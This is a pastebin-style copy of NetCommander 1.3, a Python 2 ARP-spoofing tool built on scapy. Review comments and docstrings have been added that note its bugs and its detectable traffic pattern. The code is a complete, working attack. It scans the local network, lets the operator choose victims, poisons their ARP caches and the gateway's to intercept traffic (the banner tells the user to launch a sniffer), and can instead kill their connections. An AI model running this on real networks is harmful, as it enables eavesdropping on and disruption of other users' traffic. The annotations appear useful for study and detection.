opexxx

netcmd.py

May 19th, 2014
  1. #!/usr/bin/python
  2. # This file is part of NetCommander.
  3. #
  4. # Copyright(c) 2010-2011 Simone Margaritelli
  5. # evilsocket@gmail.com
  6. # http://www.evilsocket.net
  7. # http://www.backbox.org
  8. #
  9. # This file may be licensed under the terms of of the
  10. # GNU General Public License Version 2 (the ``GPL'').
  11. #
  12. # Software distributed under the License is distributed
  13. # on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
  14. # express or implied. See the GPL for the specific language
  15. # governing rights and limitations.
  16. #
  17. # You should have received a copy of the GPL along with this
  18. # program. If not, go to http://www.gnu.org/licenses/gpl.html
  19. # or write to the Free Software Foundation, Inc.,
  20. # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
  21. import logging
  22. import time
  23. import os
  24. import sys
  25. import atexit
  26. import re
  27. from optparse import OptionParser
  28. import warnings
  29.  
# Ignore DeprecationWarning before scapy is imported. The filter is
# process-wide: it hides every DeprecationWarning, not only scapy's.
warnings.filterwarnings( "ignore", category = DeprecationWarning )
# Raise the "scapy.runtime" logger to ERROR so scapy's import-time
# warnings (the original comment mentions IPv6) are not shown.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  34.  
  35. from scapy.all import srp,Ether,ARP,conf,sendp,ltoa,atol
  36.  
class NetCmd:
  """ARP cache poisoning helper built on scapy (Python 2 syntax).

  The constructor does all of the setup: it reads the gateway and network
  for the chosen interface from scapy's routing table, ARP-scans the
  network, asks the operator to pick targets (unless ``all`` is set),
  builds the frames, switches the host's IPv4 forwarding on or off, and
  registers restore_cache() with atexit.

  On the wire this shows up as a broadcast ARP sweep of the whole network,
  followed by periodic ARP requests in which this host uses the gateway's
  IP and each target's IP as the ARP sender address. That is the pattern
  switch-side dynamic ARP inspection and arpwatch-style "IP changed MAC"
  monitors key on.
  """

  def __bit_count( self, n ):
    """Return the number of set bits in n.

    __init__ uses it to turn a netmask integer into a prefix length.
    Assumes n is non-negative; a negative int never shifts down to 0.
    """
    bits = 0
    while n:
      bits += n & 1
      n   >>= 1
    return bits

  def __set_forwarding( self, status ):
    """Switch the host's IPv4 forwarding on (status True) or off.

    On darwin this shells out to sysctl; on anything else it writes to
    /proc/sys/net/ipv4/ip_forward and raises if that file is missing.
    The previous value is never read or saved, so restore_cache() always
    leaves forwarding off, whatever it was before the run.
    """
    # Mac OS X
    if sys.platform == 'darwin':
      # NOTE(review): the conditional expression binds looser than '%', so
      # this parses as ("sysctl ...=%s" % '1') if status == True else '0'.
      # When status is not True the command handed to os.popen is the bare
      # string '0', and the sysctl is never set to 0.
      p = os.popen( "sysctl -w net.inet.ip.forwarding=%s" % '1' if status == True else '0' )
      output = p.readline()
      p.close()

      # The output is only validated when turning forwarding on.
      if status and not re.match( r'net\.inet\.ip\.forwarding:\s+\d\s+\->\s+\d', output ):
        raise Exception( "Unexpected output '%s' while turning ip forwarding." % output )
    # Linux
    else:
      if not os.path.exists( '/proc/sys/net/ipv4/ip_forward' ):
        raise Exception( "'/proc/sys/net/ipv4/ip_forward' not found, this is not a compatible operating system." )

      # No try/finally: fd is left open if write() raises.
      fd = open( '/proc/sys/net/ipv4/ip_forward', 'w+' )
      fd.write( '1' if status == True else '0' )
      fd.close()

  def __preload_mac_table( self ):
    """Load the optional 'mac-prefixes' file into self.mac_prefixes.

    The path is relative, so the file is looked up in the current working
    directory. Each line is split at the first space into a prefix and a
    vendor name. A line with no space makes the tuple unpacking raise
    ValueError, which is not handled here.
    """
    if os.path.exists( 'mac-prefixes' ):
      print "@ Preloading MAC table ..."

      fd = open( 'mac-prefixes' )
      for line in iter(fd):
        ( prefix, vendor ) = line.strip().split( ' ', 1 )
        self.mac_prefixes[prefix] = vendor

      fd.close()

  def __find_mac_vendor( self, mac ):
    """Return the vendor name for mac, or '' when its prefix is unknown."""
    # Lookup key: the first six hex digits, colons removed, upper-cased.
    mac = mac.replace( ':', '' ).upper()[:6]
    try:
      return self.mac_prefixes[mac]
    except KeyError as e:
      return ''

  def find_alive_hosts( self ):
    """ARP-scan self.network and rebuild self.endpoints / self.gateway_hw.

    Raises Exception when no endpoint answered and self.all is false.
    """
    # Both are reset on every scan. If the gateway does not answer within
    # the timeout, gateway_hw stays None and nothing here checks for that.
    self.gateway_hw = None
    self.endpoints  = []

    print "@ Searching for alive network endpoints ..."

    # broadcast arping ftw
    # One broadcast ARP request per address in self.network. The capture
    # filter keeps ARP frames whose header byte 7 (low byte of the opcode)
    # is 2, i.e. ARP replies. srp() stops waiting after 2 seconds.
    ans,unans = srp( Ether( dst = "ff:ff:ff:ff:ff:ff" ) / ARP( pdst = self.network ),
                     verbose = False,
                     filter  = "arp and arp[7] = 2",
                     timeout = 2,
                     iface_hint = self.network )

    # The reply from the gateway's IP gives gateway_hw; every other
    # responder is stored as a ( mac, ip ) tuple.
    for snd,rcv in ans:
      if rcv.psrc == self.gateway:
        self.gateway_hw = rcv.hwsrc
      else:
        self.endpoints.append( ( rcv.hwsrc, rcv.psrc ) )

    if self.endpoints == [] and not self.all:
      raise Exception( "Could not find any network alive endpoint." )

  def __init__( self, interface, gateway = None, network = None, kill = False, all = False ):
    """Discover the network, select targets and prepare the frames.

    interface -- interface name to match against scapy's routing table
    gateway   -- gateway IP; taken from the routing table when None
    network   -- network to scan; replaced by the value derived from the
                 routing table when a matching route is found
    kill      -- when true, IPv4 forwarding is switched off, not on
    all       -- when true, every discovered endpoint becomes a target
                 and the interactive prompt is skipped

    Raises Exception when not run as root, when no gateway/network can be
    determined, or when find_alive_hosts() raises.
    """
    # silence scapy's own output
    conf.verb = 0

    self.interface    = interface
    self.network      = network
    self.targets      = []
    self.gateway      = gateway
    self.all          = all
    self.gateway_hw   = None
    self.packets      = []
    self.restore      = []
    self.endpoints    = []
    self.mac_prefixes = {}

    if not os.geteuid() == 0:
      raise Exception( "Only root can run this script." )

    self.__preload_mac_table()

    print "@ Searching for the network gateway address ..."

    # for route in conf.route.routes:
    # NOTE(review): unpacks five fields per route entry; presumably newer
    # scapy releases add a field, which would break this. Confirm against
    # the scapy version in use.
    for net, msk, gw, iface, addr in conf.route.routes:
      # found a route for given interface
      if iface == self.interface:
        # This local rebinds the 'network' parameter; the caller's value
        # survives only in self.network.
        network = ltoa( net )
        # compute network representation if not yet done
        # Only the first octet of the route's network and of the local
        # address are compared before self.network is overwritten.
        if network.split('.')[0] == addr.split('.')[0]:
          bits = self.__bit_count( msk )
          self.network = "%s/%d" % ( network, bits )
        # search for a valid network gateway
        if self.gateway is None and gw != '0.0.0.0':
          self.gateway = gw

    if self.gateway is not None and self.network is not None:
      print "@ Gateway is %s on network %s ." % ( self.gateway, self.network )
    else:
      raise Exception( "Could not find any network gateway." )

    self.find_alive_hosts()

    print "@ Please choose your target :"
    choice = None

    if all:
      self.targets = self.endpoints
    else:
      # Prompt until one input is accepted: '*' takes every endpoint,
      # 'r' rescans and asks again, anything else is used as a list index.
      while choice is None:
        for i, item in enumerate( self.endpoints ):
          ( mac, ip ) = item
          vendor      = self.__find_mac_vendor( mac )
          print "  [%d] %s %s %s" % ( i, mac, ip, "( %s )" % vendor if vendor else '' )
        choice = raw_input( "@ Choose [0-%d] (* to select all, r to refresh): " % (len(self.endpoints) - 1) )
        try:
          choice = choice.strip()
          if choice == '*':
            self.targets = self.endpoints
          elif choice.lower() == 'r':
            choice = None
            self.find_alive_hosts()
          else:
            # int() accepts negative numbers, and list indexing accepts
            # them too, so values outside the printed range can still
            # select an entry.
            self.targets.append( self.endpoints[ int(choice) ] )
        except Exception as e:
          # Covers both a non-numeric choice and an exception raised by the
          # rescan; every failure is reported as an invalid choice.
          print "@ Invalid choice!"
          choice = None

    self.craft_packets()

    if not kill:
      print "@ Enabling ipv4 forwarding system wide ..."
      self.__set_forwarding( True )
    else:
      print "@ Disabling ipv4 forwarding system wide to kill target connections ..."
      self.__set_forwarding( False )

    # Registered last, so restore_cache() does not run at exit if anything
    # above raised.
    atexit.register( self.restore_cache )

  def craft_packets( self ):
    """Append the poisoning and restore frames for every current target.

    Nothing is cleared first: each call appends to self.packets and
    self.restore, so a second call (see spoof()) leaves the earlier
    frames in both lists.
    """
    # craft packets to accomplish a full forwarding:
    #   gateway -> us -> target
    #   target  -> us -> gateway
    # Every frame is an ARP request ("who-has"). Ether src and ARP hwsrc
    # are not set on the poisoning frames; presumably scapy fills in the
    # local interface's MAC for both (confirm).
    for target in self.targets:
      self.packets.append( Ether( dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
      self.packets.append( Ether( dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )
      # and packets to restore the cache later
      # NOTE(review): only the Ethernet source is set to the real owner's
      # MAC here; ARP hwsrc is still left to scapy's default. If that
      # default is the local MAC, the Ethernet source and the ARP
      # sender-hardware field disagree in these frames, a mismatch ARP
      # monitors can flag. Confirm against scapy's defaults.
      self.restore.append( Ether( src = target[0],       dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
      self.restore.append( Ether( src = self.gateway_hw, dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )

  def restore_cache( self ):
    """Send the restore frames five times, then switch forwarding off.

    Registered with atexit in __init__ and also called from the main loop
    when --all is set.
    """
    # Progress goes straight to file descriptor 1 (stdout), unbuffered.
    os.write( 1, "\n@ Restoring ARP cache " )
    # Five rounds, one second apart.
    for i in range(5):
      for packet in self.restore:
        sendp( packet, iface_hint = self.gateway )
      os.write( 1, '.' )
      time.sleep(1)
    os.write( 1, "\n" )

    # Forwarding is always switched off here; the value it had before the
    # run is not restored.
    self.__set_forwarding( False )

  def spoof( self ):
    """Send every frame in self.packets once.

    The caller's loop decides how often this is repeated.
    """
    # With --all, pick up a changed endpoint list. The lists are compared
    # by value, and craft_packets() appends without clearing.
    if self.all and self.targets != self.endpoints:
      self.targets = self.endpoints
      self.craft_packets()

    for packet in self.packets:
      sendp( packet, iface_hint = self.gateway )
  211.  
# Script entry point: parse the options, build a NetCmd (which does the
# discovery and target selection) and resend the frames until interrupted.
try:
  print "\n\tNetCommander 1.3 - An easy to use arp spoofing tool.\n \
\tCopyleft Simone Margaritelli <evilsocket@gmail.com>\n \
\thttp://www.evilsocket.net\n\thttp://www.backbox.org\n";

  parser = OptionParser( usage = "usage: %prog [options]" )

  parser.add_option( "-I", "--iface",   action="store",      dest="iface",   default=conf.iface, help="Network interface to use if different from the default one." );
  parser.add_option( "-N", "--network", action="store",      dest="network", default=None,       help="Network to work on." );
  parser.add_option( "-G", "--gateway", action="store",      dest="gateway", default=None,       help="Gateway to use." );
  parser.add_option( "-K", "--kill",    action="store_true", dest="kill",    default=False,      help="Kill targets connections instead of forwarding them." )
  # NOTE(review): no type= is given, so a delay supplied on the command
  # line reaches time.sleep() below as a string; only the default 5 is a
  # number.
  parser.add_option( "-D", "--delay",   action="store",      dest="delay",   default=5,          help="Delay in seconds between one arp packet and another, default is 5." )
  parser.add_option( "-A", "--all",     action="store_true", dest="all",     default=False,      help="Keep spoofing and spoof all connected and later connected interfaces." )

  (o, args) = parser.parse_args()

  # The constructor does the root check, the gateway lookup, the ARP scan
  # and the interactive prompt, and registers restore_cache() with atexit.
  ncmd = NetCmd( o.iface, o.gateway, o.network, o.kill, o.all )

  if not o.kill:
    os.write( 1, "@ Spoofing, launch your preferred network sniffer to see target traffic " )
  else:
    os.write( 1, "@ Killing target connections " )

  # 'slept' counts loop iterations, not seconds.
  slept = 0
  while 1:
    ncmd.spoof()
    os.write( 1, '.' )
    time.sleep( o.delay )
    slept += 1

    # With --all, restore and rescan on every 11th iteration.
    # restore_cache() also switches forwarding off, and nothing in this
    # loop switches it back on afterwards.
    if o.all and slept > 10:
      ncmd.restore_cache()
      ncmd.find_alive_hosts()
      slept = 0

# Ctrl-C falls through to interpreter exit, where the atexit hook
# registered in NetCmd.__init__ runs restore_cache().
except KeyboardInterrupt:
  pass
# Any other failure is reported as one line; no traceback is printed.
except Exception as e:
  print "@ ERROR : %s" % e